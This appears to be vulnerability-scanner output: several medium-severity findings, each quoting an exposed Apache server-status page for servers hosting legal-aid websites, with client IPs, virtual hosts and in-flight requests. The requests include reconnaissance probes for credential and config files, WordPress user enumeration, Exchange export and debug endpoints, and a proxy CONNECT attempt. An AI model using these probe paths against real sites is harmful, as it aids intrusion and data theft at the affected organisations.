HTTP/1.1 7-555-0/0/633155. 1.3788376190.00.0010302.14 70.132.1.135http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 8-555-0/0/601434. 1.453163200.00.009735.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-555-0/0/581433. 7.948837210.00.009135.05 130.176.185.46http/1.1elearning.alas.org:8080GET /login/index.php HTTP/1.1 10-556301980/73/512711_ 0.0399000.00.098693.73 195.96.129.4http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 11-555-0/0/477433. 4.83883700.00.007863.28 130.176.218.136http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 12-555-0/0/413862. 7.795830700.00.006534.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-555-0/0/327804. 7.24883711710.00.004762.41 3.172.35.142http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-556301830/3/288981_ 0.51281000.00.034288.17 66.132.153.141http/1.1atlantalegalaid.org:8080PRI * HTTP/2.0 15-555-0/0/264682. 14.723163500.00.003760.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-555-0/0/230054. 0.005831200.00.003421.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-555-0/0/167251. 6.775869600.00.002320.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-553-0/0/145236. 0.0022203200.00.002056.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-553-0/0/137484. 0.0022203100.00.002099.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-553-0/0/128161. 0.0022203000.00.001819.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-553-0/0/116703. 0.0622194800.00.001692.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-553-0/0/121121. 0.0022202900.00.001644.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-553-0/0/106096. 0.0022202600.00.001535.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-553-0/0/108708. 0.0022202800.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-553-0/0/85997. 0.0022202700.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.0022214200.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.0022214100.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.0022214000.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.0022213800.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.0022213900.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.0022213700.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82667382000.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00674521700.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15664333800.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0666616376620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23666163700.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00674525200.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00674525000.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32666163710080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00674525100.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00674524900.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00674524800.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00674524700.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00674524600.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00674524500.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001133758400.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001133758300.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001133758200.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001133758100.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001133758000.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001133757900.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001133757800.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001133757700.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001133757600.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001133757500.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.001133757400.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b0215baaf595
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 17-Nov-2023 02:36:15 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 210 Parent Server MPM Generation: 209 Server uptime: 209 days 10 hours 52 minutes 16 seconds Server load: 0.08 0.02 0.01 Total accesses: 3517102 - Total Traffic: 48.3 GB CPU Usage: u148.29 s17.08 cu0 cs0 - .000914% CPU load .194 requests/sec - 2867 B/second - 14.4 kB/request 13 requests currently being processed, 12 idle workers KKKKK_KKKKWWW___________..................K..................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-209186945/5/256198K 0.00005.30.013569.54 15.158.40.169http/1.1secure.alas.org:8080GET /config.json HTTP/1.1 1-2091848210/18/249911K 0.700010.50.143618.81 70.132.1.81http/1.1on.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-209180058/27/238636K 2.740365156.00.473528.33 70.132.1.81http/1.1events.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 3-209186161/3/238558K 0.1142611.00.013367.72 130.176.137.97http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1700188570.47223496437072753906 4-209180319/26/231410K 1.380070.30.823245.16 15.158.40.169http/1.1elearning.alas.org:8080GET /about HTTP/1.1 5-209180260/24/222717_ 0.8304600.00.853171.42 70.132.1.81http/1.1events.alas.org:8080GET / HTTP/1.1 6-209186211/3/213171K 0.64215330.90.063142.55 70.132.4.67http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-209186229/11/212936K 0.050012.80.072995.59 70.132.1.81http/1.1on.alas.org:8080GET /telescope/requests HTTP/1.1 8-209186311/3/194645K 0.6027421.10.012979.61 130.176.137.97http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1700188571.904525041580200 9-2091749711/71/191580K 11.470015.91.252468.20 15.158.40.169http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 10-209187001/1/169915W 0.61001.00.002463.21 70.132.4.67http/1.1atlantalegalaid.org:8080GET /.vscode/sftp.json HTTP/1.1 11-209187011/1/144298W 0.00001.00.002140.16 70.132.1.81http/1.1events.alas.org:8080GET /about HTTP/1.1 12-209187102/2/138792W 0.00002.10.001892.14 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 13-209187110/0/99418_ 0.00100.00.001340.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-209187160/0/86119_ 0.00100.00.001087.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-209187210/0/87704_ 0.00100.00.001133.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-209187300/0/72081_ 1.62000.00.00984.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-209187310/0/40936_ 0.00000.00.00559.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-209187360/0/32081_ 0.00000.00.00415.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-209187410/0/30672_ 0.00000.00.00457.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-209187420/0/27336_ 0.00000.00.00394.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-209187470/0/26058_ 0.00000.00.00420.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-209187520/0/25944_ 0.00000.00.00346.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-209187570/0/26839_ 0.00000.00.00370.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-209-0/0/23934. 0.00345200.00.00274.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-209-0/0/11935. 0.00344600.00.00198.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-209-0/0/10540. 0.00344700.00.00179.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-209-0/0/12093. 0.00344200.00.00166.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-209-0/0/11383. 0.00343600.00.00135.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-209-0/0/8798. 0.00343100.00.00132.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-209-0/0/9344. 0.00344300.00.00137.44 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-209-0/0/9069. 0.00343400.00.00123.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-209-0/0/11162. 0.00343500.00.00139.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-209-0/0/8804. 0.00343800.00.00144.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-209-0/0/8788. 0.00344500.00.00107.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-209-0/0/7869. 0.00343900.00.00104.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-209-0/0/8284. 0.00344400.00.00128.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-209-0/0/11010. 0.00344100.00.00131.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-209-0/0/8455. 0.00344000.00.00100.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-209-0/0/8702. 0.01343300.00.00120.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-209-0/0/7066. 0.00343700.00.0078.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-209-0/0/4064. 0.00346600.00.0039.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-209181931/22/4406K 1.64215.10.2548.96 70.132.1.136http/1.1on.alas.org:8080GET /server-status HTTP/1.1 43-209-0/0/4049. 0.00346500.00.0028.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-209-0/0/1619. 0.00349300.00.0017.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-209-0/0/2523. 0.00349200.00.0032.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-209-0/0/1763. 0.00349100.00.0015.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-209-0/0/1667. 0.00349000.00.0028.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-209-0/0/2830. 0.00348800.00.0036.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-209-0/0/2489. 0.00348900.00.0025.02 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-209-0/0/2807. 0.00348700.00.0035.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-209-0/0/1462. 0.00348600.00.0020.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-209-0/0/1770. 0.00348500.00.0023.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-209-0/0/1754. 0.00348400.00.0022.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-209-0/0/1289. 0.00348300.00.0025.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-209-0/0/1384. 0.00348200.00.0015.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-209-0/0/1991. 0.00</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b0215c4d44aa
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 16-Nov-2023 23:43:40 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 210 Parent Server MPM Generation: 209 Server uptime: 209 days 7 hours 59 minutes 42 seconds Server load: 0.00 0.00 0.00 Total accesses: 3516108 - Total Traffic: 48.3 GB CPU Usage: u161.53 s19.51 cu0 cs.04 - .001% CPU load .194 requests/sec - 2868 B/second - 14.4 kB/request 2 requests currently being processed, 8 idle workers _WK_..___.___................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-209170990/6/256109_ 0.1415800.00.073568.34 70.132.4.67http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 1-209168842/25/249846W 0.68002.10.453617.99 70.132.1.81http/1.1short.alas.org:8080GET /server-status HTTP/1.1 2-209169044/24/238561K 1.79004.30.203527.22 70.132.1.81http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-209171040/4/238508_ 0.06211510.00.053367.01 130.176.106.77http/1.1gwinnettfamilylawclinic.org:808GET /favicon.ico HTTP/1.1 4-209-0/0/231353. 0.0821000.00.003243.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-209-0/0/222652. 4.3020900.00.003169.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-209171100/5/213123_ 0.05200.00.023139.65 70.132.1.81http/1.1short.alas.org:8080GET / HTTP/1.1 7-209172420/1/212887_ 0.062021380.00.052995.29 130.176.137.97http/1.1gwinnettfamilylawclinic.org:808GET /?author=3 HTTP/1.1 8-209165020/48/194583_ 2.39133750.01.272978.13 130.176.29.140http/1.1gwinnettfamilylawclinic.org:808HEAD / HTTP/1.1 9-209-0/0/191507. 0.2420800.00.002466.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-209172470/1/169861_ 0.6217015650.00.002462.48 130.176.76.138http/1.1atlantalegalaid.org:8080GET /wp-login.php HTTP/1.1 11-209172480/1/144256_ 0.611707380.00.002139.19 130.176.137.97http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1700178044.553761959075927 12-209169410/15/138750_ 0.88124720.01.581891.23 130.176.93.67http/1.1gwinnettfamilylawclinic.org:808GET /robots.txt HTTP/1.1 13-209-0/0/99398. 0.00292300.00.001339.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-209-0/0/86109. 4.95579200.00.001087.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-209-0/0/87696. 0.00742100.00.001133.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-209-0/0/72049. 0.74777300.00.00984.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-209-0/0/40927. 0.00813600.00.00559.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-209-0/0/32076. 0.001151000.00.00415.13 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-209-0/0/30667. 0.001150700.00.00457.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-209-0/0/27332. 0.001150900.00.00394.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-209-0/0/26054. 0.001150800.00.00420.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-209-0/0/25941. 0.001150600.00.00346.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-209-0/0/26835. 2.81926400.00.00370.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-209-0/0/23931. 0.001150500.00.00274.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-209-0/0/11933. 0.001988600.00.00198.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-209-0/0/10538. 0.001988400.00.00179.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-209-0/0/12091. 0.001988300.00.00166.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-209-0/0/11381. 0.001988200.00.00135.60 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-209-0/0/8794. 5.201738700.00.00132.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-209-0/0/9342. 0.001988100.00.00137.44 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-209-0/0/9066. 1.381938900.00.00123.44 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-209-0/0/11160. 2.991738900.00.00139.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-209-0/0/8802. 0.001988000.00.00144.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-209-0/0/8786. 0.641968000.00.00107.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-209-0/0/7867. 0.001987900.00.00104.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-209-0/0/8282. 0.001987800.00.00128.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-209-0/0/11008. 0.001987700.00.00131.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-209-0/0/8453. 0.001987600.00.00100.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-209-0/0/8699. 0.001987400.00.00120.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-209-0/0/7064. 0.001987500.00.0078.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-209-0/0/4062. 0.001987300.00.0039.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-208-0/0/4384. 0.0010984700.00.0048.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-208-0/0/4047. 0.0010984600.00.0028.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-208-0/0/1618. 0.0010984900.00.0017.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-208-0/0/2522. 0.0110984400.00.0032.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-208-0/0/1762. 1.2010933200.00.0015.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-208-0/0/1666. 0.0010984500.00.0028.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-208-0/0/2829. 0.0010984100.00.0036.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-208-0/0/2488. 0.0010982000.00.0025.02 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-208-0/0/2806. 0.9810933600.00.0035.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-208-0/0/1461. 0.0010981900.00.0020.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-208-0/0/1769. 0.0010981700.00.0023.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-208-0/0/1753. 2.9610933500.00.0022.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-208-0/0/1288. 0.0010981800.00.0025.99 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-208-0/0/1383. 1.4910933400.00.0015.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-208-0/0/1990. 0.0010981600.00.0036.58 ::1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021f27c066b
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 06-Nov-2023 04:09:49 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 199 Parent Server MPM Generation: 198 Server uptime: 198 days 12 hours 25 minutes 51 seconds Server load: 0.15 0.03 0.01 Total accesses: 3384052 - Total Traffic: 46.2 GB CPU Usage: u167.33 s19.52 cu0 cs0 - .00109% CPU load .197 requests/sec - 2895 B/second - 14.3 kB/request 13 requests currently being processed, 6 idle workers WKK__KK_WKKK_KKKK__............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-198106829/19/246760W 1.630072.40.163417.51 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 1-198105358/27/240785K 1.74008.90.243460.67 15.158.40.169http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-1981094912/12/229876K 0.001017.20.023370.84 15.158.40.169http/1.1short.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 3-198107620/6/229256_ 0.66100.00.033194.93 64.252.66.89http/1.1gwinnettfamilylawclinic.org:808GET /wp-content/uploads/2015/12/Permanent-Parenting-Plan-LONG-D 4-198108110/12/223607_ 1.3025290.00.233119.05 70.132.1.81http/1.1events.alas.org:8080GET / HTTP/1.1 5-1981068811/19/214526K 0.861023.90.093020.51 15.158.40.169http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 6-198108126/9/203967K 2.031384269.30.282996.92 70.132.4.67http/1.1atlantalegalaid.org:8080GET /config.json HTTP/1.1 7-198109550/1/204941_ 0.0802590.00.002857.43 130.176.137.97http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1699243783.21535992622375488281 8-198109600/2/186808W 0.45000.00.132865.71 70.132.1.81http/1.1events.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-198998813/39/183555K 0.761316316.30.422342.96 70.132.1.81http/1.1events.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 10-198109612/2/162981K 0.00402.20.002345.74 15.158.40.167http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 11-198109701/1/137600K 0.07214026.20.032035.47 130.176.106.76http/1.1gwinnettfamilylawclinic.org:808GET /page/2/ HTTP/1.1 12-198107860/15/132582_ 0.04100.00.021794.02 70.132.1.81http/1.1on.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 13-198109711/1/96292K 0.032723.20.001292.58 130.176.106.131http/1.1gwinnettfamilylawclinic.org:808GET /page/2 HTTP/1.1 14-198106985/16/82480K 1.230367334.30.391045.44 70.132.4.67http/1.1atlantalegalaid.org:8080GET /telescope/requests HTTP/1.1 15-198107038/16/84371K 1.191143242.10.351090.75 70.132.1.81http/1.1events.alas.org:8080GET /about HTTP/1.1 16-198109722/2/69036K 0.38025170.90.07940.56 70.132.4.67http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 17-198109770/1/39009_ 0.1703850.00.12532.27 70.132.1.81http/1.1events.alas.org:8080GET /v2/_catalog HTTP/1.1 18-198109900/0/31383_ 0.00200.00.00406.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-198-0/0/29817. 0.00142600.00.00446.84 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-198-0/0/26634. 0.00142500.00.00384.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-198-0/0/25344. 0.00142200.00.00410.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-198-0/0/25080. 0.00142300.00.00334.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-198-0/0/25250. 0.00142400.00.00345.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-198-0/0/23115. 0.00142100.00.00262.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-198-0/0/11693. 2.801095800.00.00195.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-198-0/0/10122. 3.141095900.00.00170.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-198-0/0/11853. 0.99960500.00.00162.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-198-0/0/10973. 2.60869400.00.00128.36 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-198-0/0/8468. 6.89519900.00.00127.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-198-0/0/9025. 3.751096300.00.00131.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-198-0/0/8907. 0.001266400.00.00121.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-198-0/0/10847. 0.001266300.00.00136.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-198-0/0/8504. 0.001266200.00.00141.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-198-0/0/8561. 0.001266100.00.00105.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-198-0/0/7623. 0.001266000.00.00102.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-198-0/0/7909. 0.001265900.00.00122.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-198-0/0/10786. 0.001265800.00.00128.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-198-0/0/8215. 3.76959900.00.0096.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-198-0/0/8418. 0.001265700.00.00118.48 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-198-0/0/6902. 0.001265600.00.0076.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-198-0/0/3932. 3.306910200.00.0038.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-198-0/0/4361. 0.007545200.00.0048.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-198-0/0/4029. 0.007545300.00.0028.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-197-0/0/1601. 0.0016237700.00.0017.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-197-0/0/2488. 0.0016237900.00.0032.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-197-0/0/1739. 0.0016236600.00.0015.49 